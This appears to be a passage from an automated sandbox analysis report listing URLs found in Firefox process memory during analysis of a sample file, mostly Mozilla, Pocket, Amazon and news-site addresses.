Source: firefox.exe, 00000021.00000003.3169134521.0000016DEA950000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3156750421.0000016DEA3EF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3285567535.00000221E1EC0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000002D.00000002.3291688000.0000022B01600000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000021.00000003.3203736370.0000016DEA336000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true&authuser=0
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4983000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://push.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://qz.com/travel-agent-millionaires-sienna-charles-jaclyn-india-1851600173?utm_source=pocket-ne
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s.zkcdn.net/Advertisers/3c46a6db92de457aac08d729b7e553ee.png
Source: firefox.exe, 00000021.00000003.3208062027.0000016DEE29F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3197686918.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3201836603.0000016DEE22A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200386647.0000016DEE22A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s.zkcdn.net/Advertisers/8c6ba27004c947fdb8667ce4914d41c8.png
Source: firefox.exe, 00000021.00000003.3208062027.0000016DEE29F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3197686918.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s.zkcdn.net/Advertisers/f85f50edcf894021a38860edd7f5438c.jpg
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.amazonaws.com/pocket-curatedcorpusapi-prod-images/014e6dbb-9ecc-4f27-9818-4dcf4bca0f21.jp
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.amazonaws.com/pocket-curatedcorpusapi-prod-images/ad78a6f9-e73d-465c-b7fd-7c8b261e5825.jp
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.amazonaws.com/pocket-curatedcorpusapi-prod-images/affc9ba4-c42f-4a1a-a1ba-5f2cc290cee9.jp
Source: firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.amazonaws.com/pocket-curatedcorpusapi-prod-images/b1da8a8e-07d7-4788-a750-b444d5b94049.jp
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.amazonaws.com/pocket-curatedcorpusapi-prod-images/b2e82c42-fd94-454a-912f-56867d09ec8d.jp
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.amazonaws.com/pocket-curatedcorpusapi-prod-images/cfaea8c3-6a2d-419a-ab01-87c07b38c434.jp
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.amazonaws.com/pocket-curatedcorpusapi-prod-images/efeba65b-769c-4faa-91a0-91743b56b2e0.jp
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/104fa582-7bc3-4175-a738-da610
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/2f642ebf-706d-4eac-8c53-46182
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/3ab33190-fd52-43d4-b1c7-165bd
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/4ae36a64-11ed-4fe9-96d8-6635b
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/77a6038f-9efe-4c74-9997-ccaed
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210808240.0000016DEA8DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/93357493-c9be-45be-b688-1504d
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/94e6f6f5-07c6-4c89-9691-ae5e0
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/969c870d-52fb-4643-a2c6-ae026
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/ab3f4075-4d4a-449a-bc6c-f78fc
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/b0851f03-bfa3-4d86-8d0b-45de1
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/b3ad74ad-c02d-4e74-910b-d7bf8
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/b49da5a6-5bcb-4af7-8332-8c6c9
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210808240.0000016DEA8DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/d0421c03-3c25-4e3e-9a01-e064b
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/d32286dc-8c2d-4eee-bf06-5de73
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/d695e43b-7ddd-4866-ae35-cc2af
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/d88601ae-5293-43b2-9eaf-2ab6b
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/db27756e-0bc3-4e96-a2a4-07619
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/dce103d2-585c-4d15-b52f-bacce
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/e2b54588-ce1c-40e5-ba96-bbbff
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/e5658c7a-9e80-4d8a-a8f8-d6792
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/eb6f4611-95fa-41c2-9b30-a9294
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/ec024fdd-4e01-4a36-9b2c-4cbc1
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/f9b342d5-c87b-4c3e-a8c4-0609f
Source: firefox.exe, 00000021.00000003.3212471692.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158551690.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3128160260.0000016DDE27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000021.00000003.3221424465.0000016DE9747000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com
Source: firefox.exe, 00000021.00000003.3221424465.0000016DE9747000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3221635085.0000016DE6BF9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3128160260.0000016DDE27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3128258779.0000016DDE270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000021.00000003.3128160260.0000016DDE27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000021.00000003.3160209289.0000016DE6762000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B01512000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE978E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B015BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: firefox.exe, 00000021.00000003.2866313930.0000016DDE1FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/inapp/
Source: firefox.exe, 00000021.00000003.2880752425.0000016DDF4D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2863559755.0000016DDF4D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000021.00000003.3164533070.0000016DDEAF8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3285567535.00000221E1EC0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000002D.00000002.3291688000.0000022B01600000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: firefox.exe, 00000021.00000003.3112151980.0000016DDF9B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3111528462.0000016DDF9B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3112514927.0000016DDF9B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 00000021.00000003.3165123543.0000016DDEA80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiles-cdn.prod.ads.prod.webservices.mozgcp.net/CAP5k4gWqcBGwir7bEEmBWveLMtvldFu-y_kyO3txFA=.
Source: firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiles-cdn.prod.ads.prod.webservices.mozgcp.net/m6BvG6Rcntmafem2bLfA5IktKm1SEwqO2E4XIjaC12c=.
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000021.00000003.3204676713.0000016DE9EA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3203736370.0000016DEA336000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tracking-protection.cdn.mozilla.net/mozplugin-block-digest256/1604686195
Source: firefox.exe, 00000021.00000003.3216319694.0000016DE4B24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4B2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000021.00000003.3163179964.0000016DE4B24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216319694.0000016DE4B24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://watch.sling.com/
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3142280599.0000016DE9D92000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120489863.0000016DE682F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000021.00000003.3208062027.0000016DEE29F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3197686918.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3201836603.0000016DEE22A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200386647.0000016DEE22A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ww55.affinity.net/sssdomweb?enk=615ecace6a3595ad020f9474bd23f60e3f73697b86ff155204b57785384a
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3128258779.0000016DDE270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3128258779.0000016DDE270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 00000021.00000003.3216319694.0000016DE4B24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221635085.0000016DE6BF9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3156750421.0000016DEA318000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4B2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3163108384.0000016DE4B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_47ec4889599d44b137ae68c3ce4f270931c4c512d7b18608
Source: firefox.exe, 00000021.00000003.2813756993.0000016DDD36B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3152391838.0000016DDE0B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2811196569.0000016DDD350000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3191939859.0000016DE9A8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207334568.0000016DDE0B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809919292.0000016DDD336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2814195790.0000016DDD383000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3144642447.0000016DDE0B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3190357375.0000016DDE0B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3167800992.0000016DEA9DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4BC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2896976566.0000016DDE12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165602215.0000016DEA9EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3166260392.0000016DEA9DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3161465579.0000016DE4BD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bbc.co.uk/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bbc.com/future/article/20240724-the-day-the-internet-turned-off?utm_source=pocket-newtab
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211896336.0000016DEA822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.befr.ebay.be/
